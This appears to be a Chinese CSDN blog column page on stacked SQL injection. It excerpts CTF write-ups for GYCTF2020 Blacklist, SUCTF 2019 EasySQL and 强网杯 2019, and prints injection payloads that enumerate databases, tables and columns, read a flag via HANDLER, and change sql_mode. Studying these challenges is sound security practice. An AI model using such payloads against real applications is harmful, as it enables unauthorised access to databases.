![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
堆叠注入
「已注销」
这个作者很懒,什么都没留下…
展开
-
[GYCTF2020]Blacklist
知识点堆叠注入参考堆叠注入tips查表名、列名、字段名show databases;show tables;show columns from `table_name`;本题使用HANDLER查看flag1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#原创 2020-05-12 10:39:02 · 884 阅读 · 0 评论 -
[SUCTF 2019]EasySQL
知识点堆叠注入sql_mode打开题目,如图堆叠注入查库1;show databases;查表1;show tables;查Flag1;show columns from Flag;wp给的payloadpayload:1;set sql_mode=PIPES_AS_CONCAT;SELECT 1修改sql_mode,将其设置为PIPES_AS_CONCAT,作用是将"||"作为字符串连接符而非或运算符,修改后实际语句为SELECT 1;set sql_mod原创 2020-05-11 18:10:04 · 600 阅读 · 0 评论 -
[强网杯 2019]随便注
知识点堆叠注入预编译原理参考堆叠注入详解打开题目,如图所示尝试-1' union select 1,2#发现select被禁尝试堆叠注入查库1';show databases;#查表1';show tables;#查1919810931114514表的列名1';show columns from `1919810931114514`#这里表名使用反引号进行包含应该就是从1919810931114514中查flag查words表的列名1';show colum原创 2020-05-11 18:06:49 · 262 阅读 · 0 评论